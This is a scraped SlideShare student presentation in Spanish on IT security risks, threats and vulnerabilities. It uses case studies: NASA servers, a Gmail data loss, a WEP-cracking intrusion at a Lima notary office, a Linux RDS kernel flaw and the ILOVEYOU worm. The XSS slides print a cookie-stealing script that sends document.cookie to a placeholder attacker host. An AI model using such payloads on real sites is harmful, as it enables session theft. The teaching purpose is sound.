SlideShare una empresa de Scribd logo
1 de 27
SEGURIDAD  EN Computación E Informática TEMAS: TIC 	* RIESGOS 	* AMENAZAS 	* IMPACTOS 	* VULNERABILIDADES Integrantes  : ,[object Object]
Cabezudo Martinez William
Agüero Ortega Isaac
Chura Huashuayo Jorge Luis,[object Object]
VULNERABILIDAD EN LA NASA
VULNERABILIDAD EN LA NASA Seis servidores de la NASA expuestos a Internet han mantenido vulnerabilidades críticas que podrían haber puesto en peligro las misiones del Transbordador Espacial, la Estación Espacial Internacional y el telescopio Hubble al abrir la puerta a ataques Internet.  Según el inspector general de la NASA, las vulnerabilidades que dejaron expuestos los servidores a ataques Internet podrían haber sido descubiertas por un programa de supervisión de seguridad aprobado por la agencia el año pasado, pero aún sin implementar.
VULNERABILIDAD EN LA NASA La auditoría llevada a cabo para investigar el incidente ha revelado también que algunos servidores expuestos contenían claves de encriptación, contraseñas encriptadas e información sobre cuenta de usuarios, datos que podrían haber sido utilizados por los atacantes para acceder a la red de la agencia sin autorización.
CASO DE GMAIL Al menos 150 mil usuarios de Gmail perdieron la información de sus cuentas por un accidente, reportó Google. En una primera instancia el reporte indicaba que las pérdidas eran por más de medio millón de cuentas, no obstante la información fue rectificada. Los usuarios experimentaron problemas para acceder a sus cuentas de Gmail, cuando por fin lograron ingresar al correo se encontraron con la sorpresa de que todo la bandeja de entrada y archivos estaban en blanco, con excepción de los tres mensajes de bienvenida que se generan cuando se crea una nueva cuenta.
CASO DE GMAIL Google explicó que menos del 0,08% de los usuarios fueron afectados por el accidente que reseteó complemente las cuentas, sin embargo en el Tablero de Estado de la Aplicación sólo está el mensaje “Nuestro equipo continúa investigando el problema. Volveremos a dar una actualización by February 28, 2011 9:00:00 AM UTC-6 con más información sobre este problema. Gracias por su paciencia”, y así se repite en los tres mensaje anteriores. Aún no se determina el cuál es el error o cómo se produjo.
Caso de seguridad Inalambrica Caso pérdida de información importante en una notaria limeña- Enero 2011 Una conocida notaría limeña fue victima de un ataque de robo y destrucción de información, debido a una falla de seguridad inalámbrica, expuesta gracias a una falta de planificación en tecnologías de información.
El ataque fue realizado desde una vivienda cercana, al realizar un crackeo de la clave inalámbrica WEP mediante la herramienta WIFISLAX, ya que ésta clave era solo de 64 bits, admitía 5 caracteres, y es muy sencilla para esta herramienta descifrarla
Se conectaron a la red inalámbrica con éxito, entonces revisaron la tabla DHCP
Lo mas posible es que se haya utilizado un programa para escanear la red Lan, y también descubrir los clientes no conectados con DHCP  e inalámbricos
Se ubicó a los usuarios de la red y se realizo exploración vía FTP a todos ellos.
Se lograron tener acceso a los archivos importantes debido a que tenían la unidad D de cada equipo en modo compartido y con todos los permisos. Entonces la información fue sustraída y posteriormente eliminada del disco duro de los equipos principales.
Por ultimo, revisaron en la tabla de puertos habilitados del router aquellos equipos con conexiones interesantes, entre otros, ubicaron un servidor de archivos con la conexión remota activada(3389)
Dada que la cuenta administrador, no tenia contraseña, se logró establecer acceso irrestricto al equipo, al dominio, a información personal y control sobre los usuarios, permitiéndoles durante 2 meses obtener datos recientes sobre litigios, contratos, etc. De manera sigilosa, y fueron descubiertos al hacer una auditoria de la red.
Caso kernel - Descubren grave vulnerabilidad en kernel de Linux   La vulnerabilidad se encuentra -específicamente- en la implementacion del protocolo Reliable Datagram Sockets (RDS), afectando a las máquinas que tengan activada la opción CONFIG_RDS y no tengan restricciones a los usuarios sin privilegios de cargar los módulos de paquete familiar, lo que sucede con la mayoría de las distribuciones del sistema operativo. VSR Security comenta: Debido a que las funciones del núcleo responsable de la copia de datos entre el núcleo y el espacio de usuario no pudo verificar que un usuario-proporcionado por la dirección residido efectivamente en el segmento de usuario, un atacante local podría emitir función especialmente diseñado toma las llamadas a escribir valores arbitrarios en la memoria del kernel.Aprovechando esta capacidad, es posible que los usuarios sin privilegios puedan escalar privilegios a root. Un exploit ha sido liberado por la misma compañia de seguridad para demostrar lo peligroso de la vulnerabilidad. Al mismo tiempo, la gente de H Security no espero más tiempo para tomar el exploit y testearlo en Ubuntu 10.04 (64-bit), con un resultado exitoso, pero desastroso para el sistema.
Un parche para solucionar el problema ha sido enviado a Linus Torvalds para que el próximo kernel no incluya el problema, aunque se espera que cada distribución incluya una actualización al sistema operativo que corrija la vulnerabilidad. Impacto:  La caída del Sistema operativo . Acceso a personas ajenas a la empresa para el total dominio de la información de esta empresa. Perdida de información vital. Información alterada de mala fuente.
   CASO APLICATIVO SOBRE LA VULNERABILIDAD INYECCION DE CODIGO MALICIOSO
Supongamos que la página de inicio de CómoFunciona.net es vulnerable a un ataque por secuencia de comandos entre páginas Web ya que en ella puede aparecer un mensaje de bienvenida con el nombre del usuario como un parámetro:     http://es.kioskea.net/?nom=Jeff. Una persona malintencionada podría llevar a cabo un ataque XSS al proporcionar a la víctima una dirección que reemplace el nombre "Jeff" con un código HTML. En especial, podría transferir el siguiente código JavaScript como un parámetro para redireccionar al usuario a una página controlada por el pirata informático: <SCRIPT> document.location='http://site.pirate/cgi-bin/script.cgi?'+document.cookie </SCRIPT>
El código anterior recupera las cookies del usuario y las envía como parámetros a una secuencia de comandos CGI. El siguiente código transferido como un parámetro sería demasiado obvio:     http://es.kioskea.net/?nom=<SCRIPT>document.location ='http://site.pirate/cgi-bin/script.cgi?'+document.cookie</SCRIPT> No obstante, la codificación de la dirección URL permite ocultar el ataque:     http://es.kioskea.net/?nom=%3c%53%43%...
   CASO APLICATIVO DEL IMPACTO DE LAS AMENAZAS AMENAZA DEL GUSANO “I LOVE YOU” o  “LOVE LETTER”
El día jueves 4 de mayo del 2000 una alarma sacudió al mundo de las computadoras, los creadores del virus conectaron con el proveedor de acceso a Internet (ISP) llamado Internet Sky y soltaron su ”monstruo”,se trató de un gusano informático que se propagaba rápidamente vía correo electrónico. El sistema operativo afectado por el gusano fue Windows con el Windows Scripting Host activado. ILOVEYOU es un programa, realizado en Visual Basic, que tiene la habilidad de mandarse a si mismo vía correo electrónico a todas las direcciones contenidas en la libreta del programa Microsoft Outlook de la computadora infectada. Después de instalarse en la computadora, el gusano altera imágenes y archivos de audio.
El asunto del correo electrónico era “ILOVEYOU”, con un adjunto de nombre "LOVE-LETTER-FOR-YOU.TXT.vbs". En el cuerpo del mensaje se leía: "kindly check the attached LOVELETTER coming from me".
Consecuencias del impacto de esta amenaza: ,[object Object]

Más contenido relacionado

La actualidad más candente

Taller de seguridad informatica
Taller de seguridad informaticaTaller de seguridad informatica
Taller de seguridad informaticaJuan Osorio
 
Actividad No. 2.3- Ataque contra contraseñas de sistemas WINDOWS
Actividad No. 2.3- Ataque contra contraseñas de sistemas WINDOWSActividad No. 2.3- Ataque contra contraseñas de sistemas WINDOWS
Actividad No. 2.3- Ataque contra contraseñas de sistemas WINDOWSFrancisco Medina
 
Amenazas y fraudes en internet bruno de llanos
Amenazas y fraudes en internet bruno de llanosAmenazas y fraudes en internet bruno de llanos
Amenazas y fraudes en internet bruno de llanosBrunoDeLlanos
 
Delincuentes informaticos 102
Delincuentes informaticos 102Delincuentes informaticos 102
Delincuentes informaticos 102duvanalba
 
Actividad No 4.2 IPv4 Telnet
Actividad No 4.2 IPv4 TelnetActividad No 4.2 IPv4 Telnet
Actividad No 4.2 IPv4 TelnetFrancisco Medina
 
Privacidad En La Red
Privacidad En La RedPrivacidad En La Red
Privacidad En La Redxhelazz
 
Actividad No. 4: Captura e Inyección de paquetes en redes WLAN
Actividad No. 4: Captura e Inyección de paquetes en redes WLANActividad No. 4: Captura e Inyección de paquetes en redes WLAN
Actividad No. 4: Captura e Inyección de paquetes en redes WLANFrancisco Medina
 
Malware pos punky seguridad informatica
Malware pos punky seguridad informaticaMalware pos punky seguridad informatica
Malware pos punky seguridad informaticaDavid Thomas
 
Clase 6 virus informatico
Clase 6   virus informaticoClase 6   virus informatico
Clase 6 virus informaticosonia1967rojas
 

La actualidad más candente (18)

Taller de seguridad informatica
Taller de seguridad informaticaTaller de seguridad informatica
Taller de seguridad informatica
 
Actividad No. 2.3- Ataque contra contraseñas de sistemas WINDOWS
Actividad No. 2.3- Ataque contra contraseñas de sistemas WINDOWSActividad No. 2.3- Ataque contra contraseñas de sistemas WINDOWS
Actividad No. 2.3- Ataque contra contraseñas de sistemas WINDOWS
 
Heartbleed
HeartbleedHeartbleed
Heartbleed
 
Amenazas y fraudes en internet bruno de llanos
Amenazas y fraudes en internet bruno de llanosAmenazas y fraudes en internet bruno de llanos
Amenazas y fraudes en internet bruno de llanos
 
Proxy
ProxyProxy
Proxy
 
Práctica 3.4 NAT
Práctica 3.4 NATPráctica 3.4 NAT
Práctica 3.4 NAT
 
Delincuentes informaticos 102
Delincuentes informaticos 102Delincuentes informaticos 102
Delincuentes informaticos 102
 
Actividad No 4.2 IPv4 Telnet
Actividad No 4.2 IPv4 TelnetActividad No 4.2 IPv4 Telnet
Actividad No 4.2 IPv4 Telnet
 
Privacidad En La Red
Privacidad En La RedPrivacidad En La Red
Privacidad En La Red
 
WEP
WEPWEP
WEP
 
Ransomware
RansomwareRansomware
Ransomware
 
Hackeando con un troyano
Hackeando con un troyanoHackeando con un troyano
Hackeando con un troyano
 
Noticia Abril
Noticia Abril Noticia Abril
Noticia Abril
 
Virus informatico
Virus informaticoVirus informatico
Virus informatico
 
Actividad No. 4: Captura e Inyección de paquetes en redes WLAN
Actividad No. 4: Captura e Inyección de paquetes en redes WLANActividad No. 4: Captura e Inyección de paquetes en redes WLAN
Actividad No. 4: Captura e Inyección de paquetes en redes WLAN
 
Trabajo 4
Trabajo 4Trabajo 4
Trabajo 4
 
Malware pos punky seguridad informatica
Malware pos punky seguridad informaticaMalware pos punky seguridad informatica
Malware pos punky seguridad informatica
 
Clase 6 virus informatico
Clase 6   virus informaticoClase 6   virus informatico
Clase 6 virus informatico
 

Destacado

Auditoria Informatica
Auditoria InformaticaAuditoria Informatica
Auditoria Informaticaxsercom
 
Auditoria Informática o de Sistemas - Introducción
Auditoria Informática o de Sistemas - IntroducciónAuditoria Informática o de Sistemas - Introducción
Auditoria Informática o de Sistemas - IntroducciónUniversidad San Agustin
 
Planeacion De La Auditoria Informatica
Planeacion De La Auditoria InformaticaPlaneacion De La Auditoria Informatica
Planeacion De La Auditoria Informaticajanethvalverdereyes
 
Informe final de Auditoria Informatica
Informe final de Auditoria InformaticaInforme final de Auditoria Informatica
Informe final de Auditoria InformaticaAmd Cdmas
 
Guía para análisis de amenazas, vulnerabilidades
Guía para análisis de amenazas, vulnerabilidadesGuía para análisis de amenazas, vulnerabilidades
Guía para análisis de amenazas, vulnerabilidadesPlan International Ecuador
 
Amenazas y vulnerabilidades en la informática
Amenazas y vulnerabilidades en la informáticaAmenazas y vulnerabilidades en la informática
Amenazas y vulnerabilidades en la informáticaCarolina Cols
 
Tipos de auditoria informatica
Tipos de auditoria informaticaTipos de auditoria informatica
Tipos de auditoria informaticaWil Vin
 
Presentacion informe de auditoria final
Presentacion informe de auditoria finalPresentacion informe de auditoria final
Presentacion informe de auditoria finalshernandez3854
 
Clase riesgos-amenazas-vulnerabilidades
Clase riesgos-amenazas-vulnerabilidadesClase riesgos-amenazas-vulnerabilidades
Clase riesgos-amenazas-vulnerabilidadessimondavila
 
Auditoria informatica
Auditoria informaticaAuditoria informatica
Auditoria informaticaluismarlmg
 
Herramientas y técnicas para la auditoria informática
Herramientas y técnicas para la auditoria informáticaHerramientas y técnicas para la auditoria informática
Herramientas y técnicas para la auditoria informáticajoseaunefa
 
Amenazas a la Seguridad Informática
Amenazas a la Seguridad InformáticaAmenazas a la Seguridad Informática
Amenazas a la Seguridad Informáticapersonal
 

Destacado (16)

Seg fiis eq_04_tic
Seg fiis eq_04_ticSeg fiis eq_04_tic
Seg fiis eq_04_tic
 
Auditoria informatica
Auditoria informaticaAuditoria informatica
Auditoria informatica
 
Auditoria Informatica
Auditoria InformaticaAuditoria Informatica
Auditoria Informatica
 
Auditoria Informática o de Sistemas - Introducción
Auditoria Informática o de Sistemas - IntroducciónAuditoria Informática o de Sistemas - Introducción
Auditoria Informática o de Sistemas - Introducción
 
Planeacion De La Auditoria Informatica
Planeacion De La Auditoria InformaticaPlaneacion De La Auditoria Informatica
Planeacion De La Auditoria Informatica
 
Informe final de Auditoria Informatica
Informe final de Auditoria InformaticaInforme final de Auditoria Informatica
Informe final de Auditoria Informatica
 
Guía para análisis de amenazas, vulnerabilidades
Guía para análisis de amenazas, vulnerabilidadesGuía para análisis de amenazas, vulnerabilidades
Guía para análisis de amenazas, vulnerabilidades
 
Amenazas y vulnerabilidades en la informática
Amenazas y vulnerabilidades en la informáticaAmenazas y vulnerabilidades en la informática
Amenazas y vulnerabilidades en la informática
 
Tipos de auditoria informatica
Tipos de auditoria informaticaTipos de auditoria informatica
Tipos de auditoria informatica
 
Presentacion informe de auditoria final
Presentacion informe de auditoria finalPresentacion informe de auditoria final
Presentacion informe de auditoria final
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad Informatica
 
Clase riesgos-amenazas-vulnerabilidades
Clase riesgos-amenazas-vulnerabilidadesClase riesgos-amenazas-vulnerabilidades
Clase riesgos-amenazas-vulnerabilidades
 
Auditoria informatica
Auditoria informaticaAuditoria informatica
Auditoria informatica
 
Herramientas y técnicas para la auditoria informática
Herramientas y técnicas para la auditoria informáticaHerramientas y técnicas para la auditoria informática
Herramientas y técnicas para la auditoria informática
 
Amenazas a la Seguridad Informática
Amenazas a la Seguridad InformáticaAmenazas a la Seguridad Informática
Amenazas a la Seguridad Informática
 
Riesgos, amenazas o vulnerabilidades
Riesgos, amenazas o vulnerabilidadesRiesgos, amenazas o vulnerabilidades
Riesgos, amenazas o vulnerabilidades
 

Similar a Seguridad informática y riesgos TIC

Similar a Seguridad informática y riesgos TIC (20)

Proyecto 6
Proyecto 6Proyecto 6
Proyecto 6
 
Noticia de abril
Noticia de abrilNoticia de abril
Noticia de abril
 
Noticia de abril
Noticia de abrilNoticia de abril
Noticia de abril
 
Abril
AbrilAbril
Abril
 
Vulnerabilidades y soluciones Evidencias 3, Iber Pardo Aguilar
Vulnerabilidades y soluciones Evidencias 3, Iber Pardo AguilarVulnerabilidades y soluciones Evidencias 3, Iber Pardo Aguilar
Vulnerabilidades y soluciones Evidencias 3, Iber Pardo Aguilar
 
Noticia abril
Noticia abrilNoticia abril
Noticia abril
 
Compu ...noticia 6
Compu ...noticia 6Compu ...noticia 6
Compu ...noticia 6
 
openssl
opensslopenssl
openssl
 
Compu ...noticia 6
Compu ...noticia 6Compu ...noticia 6
Compu ...noticia 6
 
Compu ...noticia 6
Compu ...noticia 6Compu ...noticia 6
Compu ...noticia 6
 
Compu ...noticia 6
Compu ...noticia 6Compu ...noticia 6
Compu ...noticia 6
 
Resumen pendiente.
Resumen pendiente.Resumen pendiente.
Resumen pendiente.
 
Noticia abril
Noticia abrilNoticia abril
Noticia abril
 
Noticia de abril
Noticia de abrilNoticia de abril
Noticia de abril
 
Curso Virtual de Hacking Linux
Curso Virtual de Hacking LinuxCurso Virtual de Hacking Linux
Curso Virtual de Hacking Linux
 
Seguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónSeguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode Solución
 
Punto a. crear un documento pdf
Punto a. crear un documento pdfPunto a. crear un documento pdf
Punto a. crear un documento pdf
 
Medidas de-seguridad-dentro-de-una-red
Medidas de-seguridad-dentro-de-una-redMedidas de-seguridad-dentro-de-una-red
Medidas de-seguridad-dentro-de-una-red
 
Análisis de Vulnerabilidad en Paginas web
Análisis de Vulnerabilidad en Paginas webAnálisis de Vulnerabilidad en Paginas web
Análisis de Vulnerabilidad en Paginas web
 
Practica 6
Practica 6Practica 6
Practica 6
 

Más de Alexander Velasque Rimac (20)

Presentacion TED 2019
Presentacion TED 2019Presentacion TED 2019
Presentacion TED 2019
 
Auditoría de sistemas controles
Auditoría de sistemas controlesAuditoría de sistemas controles
Auditoría de sistemas controles
 
Auditoría de sistemas controles
Auditoría de sistemas controlesAuditoría de sistemas controles
Auditoría de sistemas controles
 
Controles
ControlesControles
Controles
 
Controles final
Controles finalControles final
Controles final
 
Comision nro 6 as- fiis- controles
Comision nro 6  as- fiis- controlesComision nro 6  as- fiis- controles
Comision nro 6 as- fiis- controles
 
Presentación101
Presentación101Presentación101
Presentación101
 
Presentación101
Presentación101Presentación101
Presentación101
 
Controles de auditoria
Controles de auditoriaControles de auditoria
Controles de auditoria
 
Controle scomisión1
Controle scomisión1Controle scomisión1
Controle scomisión1
 
Medidas de control
Medidas de controlMedidas de control
Medidas de control
 
Is audit ..
Is audit ..Is audit ..
Is audit ..
 
Is auditing standars
Is auditing standarsIs auditing standars
Is auditing standars
 
Comision nro 6 as- fiis- iiasac
Comision nro 6   as- fiis- iiasacComision nro 6   as- fiis- iiasac
Comision nro 6 as- fiis- iiasac
 
Dti auditoria de sistemas
Dti   auditoria de sistemasDti   auditoria de sistemas
Dti auditoria de sistemas
 
Coso final-cd
Coso final-cdCoso final-cd
Coso final-cd
 
Cobit
CobitCobit
Cobit
 
Organigramas 1- exposicion
Organigramas  1- exposicionOrganigramas  1- exposicion
Organigramas 1- exposicion
 
Auditoria trabajo empresa
Auditoria trabajo empresaAuditoria trabajo empresa
Auditoria trabajo empresa
 
Empresas con auditorías de sistemas
Empresas con auditorías de sistemasEmpresas con auditorías de sistemas
Empresas con auditorías de sistemas
 

Seguridad informática y riesgos TIC

  • 1.
  • 4.
  • 6. VULNERABILIDAD EN LA NASA Seis servidores de la NASA expuestos a Internet han mantenido vulnerabilidades críticas que podrían haber puesto en peligro las misiones del Transbordador Espacial, la Estación Espacial Internacional y el telescopio Hubble al abrir la puerta a ataques Internet. Según el inspector general de la NASA, las vulnerabilidades que dejaron expuestos los servidores a ataques Internet podrían haber sido descubiertas por un programa de supervisión de seguridad aprobado por la agencia el año pasado, pero aún sin implementar.
  • 7. VULNERABILIDAD EN LA NASA La auditoría llevada a cabo para investigar el incidente ha revelado también que algunos servidores expuestos contenían claves de encriptación, contraseñas encriptadas e información sobre cuenta de usuarios, datos que podrían haber sido utilizados por los atacantes para acceder a la red de la agencia sin autorización.
  • 8. CASO DE GMAIL Al menos 150 mil usuarios de Gmail perdieron la información de sus cuentas por un accidente, reportó Google. En una primera instancia el reporte indicaba que las pérdidas eran por más de medio millón de cuentas, no obstante la información fue rectificada. Los usuarios experimentaron problemas para acceder a sus cuentas de Gmail, cuando por fin lograron ingresar al correo se encontraron con la sorpresa de que todo la bandeja de entrada y archivos estaban en blanco, con excepción de los tres mensajes de bienvenida que se generan cuando se crea una nueva cuenta.
  • 9. CASO DE GMAIL Google explicó que menos del 0,08% de los usuarios fueron afectados por el accidente que reseteó complemente las cuentas, sin embargo en el Tablero de Estado de la Aplicación sólo está el mensaje “Nuestro equipo continúa investigando el problema. Volveremos a dar una actualización by February 28, 2011 9:00:00 AM UTC-6 con más información sobre este problema. Gracias por su paciencia”, y así se repite en los tres mensaje anteriores. Aún no se determina el cuál es el error o cómo se produjo.
  • 10. Caso de seguridad Inalambrica Caso pérdida de información importante en una notaria limeña- Enero 2011 Una conocida notaría limeña fue victima de un ataque de robo y destrucción de información, debido a una falla de seguridad inalámbrica, expuesta gracias a una falta de planificación en tecnologías de información.
  • 11. El ataque fue realizado desde una vivienda cercana, al realizar un crackeo de la clave inalámbrica WEP mediante la herramienta WIFISLAX, ya que ésta clave era solo de 64 bits, admitía 5 caracteres, y es muy sencilla para esta herramienta descifrarla
  • 12. Se conectaron a la red inalámbrica con éxito, entonces revisaron la tabla DHCP
  • 13. Lo mas posible es que se haya utilizado un programa para escanear la red Lan, y también descubrir los clientes no conectados con DHCP e inalámbricos
  • 14. Se ubicó a los usuarios de la red y se realizo exploración vía FTP a todos ellos.
  • 15. Se lograron tener acceso a los archivos importantes debido a que tenían la unidad D de cada equipo en modo compartido y con todos los permisos. Entonces la información fue sustraída y posteriormente eliminada del disco duro de los equipos principales.
  • 16. Por ultimo, revisaron en la tabla de puertos habilitados del router aquellos equipos con conexiones interesantes, entre otros, ubicaron un servidor de archivos con la conexión remota activada(3389)
  • 17. Dada que la cuenta administrador, no tenia contraseña, se logró establecer acceso irrestricto al equipo, al dominio, a información personal y control sobre los usuarios, permitiéndoles durante 2 meses obtener datos recientes sobre litigios, contratos, etc. De manera sigilosa, y fueron descubiertos al hacer una auditoria de la red.
  • 18. Caso kernel - Descubren grave vulnerabilidad en kernel de Linux   La vulnerabilidad se encuentra -específicamente- en la implementacion del protocolo Reliable Datagram Sockets (RDS), afectando a las máquinas que tengan activada la opción CONFIG_RDS y no tengan restricciones a los usuarios sin privilegios de cargar los módulos de paquete familiar, lo que sucede con la mayoría de las distribuciones del sistema operativo. VSR Security comenta: Debido a que las funciones del núcleo responsable de la copia de datos entre el núcleo y el espacio de usuario no pudo verificar que un usuario-proporcionado por la dirección residido efectivamente en el segmento de usuario, un atacante local podría emitir función especialmente diseñado toma las llamadas a escribir valores arbitrarios en la memoria del kernel.Aprovechando esta capacidad, es posible que los usuarios sin privilegios puedan escalar privilegios a root. Un exploit ha sido liberado por la misma compañia de seguridad para demostrar lo peligroso de la vulnerabilidad. Al mismo tiempo, la gente de H Security no espero más tiempo para tomar el exploit y testearlo en Ubuntu 10.04 (64-bit), con un resultado exitoso, pero desastroso para el sistema.
  • 19.
  • 20. Un parche para solucionar el problema ha sido enviado a Linus Torvalds para que el próximo kernel no incluya el problema, aunque se espera que cada distribución incluya una actualización al sistema operativo que corrija la vulnerabilidad. Impacto: La caída del Sistema operativo . Acceso a personas ajenas a la empresa para el total dominio de la información de esta empresa. Perdida de información vital. Información alterada de mala fuente.
  • 21. CASO APLICATIVO SOBRE LA VULNERABILIDAD INYECCION DE CODIGO MALICIOSO
  • 22. Supongamos que la página de inicio de CómoFunciona.net es vulnerable a un ataque por secuencia de comandos entre páginas Web ya que en ella puede aparecer un mensaje de bienvenida con el nombre del usuario como un parámetro: http://es.kioskea.net/?nom=Jeff. Una persona malintencionada podría llevar a cabo un ataque XSS al proporcionar a la víctima una dirección que reemplace el nombre "Jeff" con un código HTML. En especial, podría transferir el siguiente código JavaScript como un parámetro para redireccionar al usuario a una página controlada por el pirata informático: <SCRIPT> document.location='http://site.pirate/cgi-bin/script.cgi?'+document.cookie </SCRIPT>
  • 23. El código anterior recupera las cookies del usuario y las envía como parámetros a una secuencia de comandos CGI. El siguiente código transferido como un parámetro sería demasiado obvio: http://es.kioskea.net/?nom=<SCRIPT>document.location ='http://site.pirate/cgi-bin/script.cgi?'+document.cookie</SCRIPT> No obstante, la codificación de la dirección URL permite ocultar el ataque: http://es.kioskea.net/?nom=%3c%53%43%...
  • 24. CASO APLICATIVO DEL IMPACTO DE LAS AMENAZAS AMENAZA DEL GUSANO “I LOVE YOU” o “LOVE LETTER”
  • 25. El día jueves 4 de mayo del 2000 una alarma sacudió al mundo de las computadoras, los creadores del virus conectaron con el proveedor de acceso a Internet (ISP) llamado Internet Sky y soltaron su ”monstruo”,se trató de un gusano informático que se propagaba rápidamente vía correo electrónico. El sistema operativo afectado por el gusano fue Windows con el Windows Scripting Host activado. ILOVEYOU es un programa, realizado en Visual Basic, que tiene la habilidad de mandarse a si mismo vía correo electrónico a todas las direcciones contenidas en la libreta del programa Microsoft Outlook de la computadora infectada. Después de instalarse en la computadora, el gusano altera imágenes y archivos de audio.
  • 26. El asunto del correo electrónico era “ILOVEYOU”, con un adjunto de nombre "LOVE-LETTER-FOR-YOU.TXT.vbs". En el cuerpo del mensaje se leía: "kindly check the attached LOVELETTER coming from me".
  • 27.
  • 28. Muchas empresas en todo el mundo de varios países llegaron a tener una cantidad considerable de computadoras infectadas.
  • 29. Las compañías tuvieron que desconectar sus servidores de correos.
  • 30.
  • 31. Recomendaciones Es recomendable realizar una auditoria periodica a la seguridad interna y perimetral de la red corporativa Manejar el tema de la cultura organizacional a todo nivel para tener conciencia de la seguridad. Las actualizaciones de todo tipo y a todo nivel , son necesarias para certificar una mayor capacidad de respuesta ante amenazas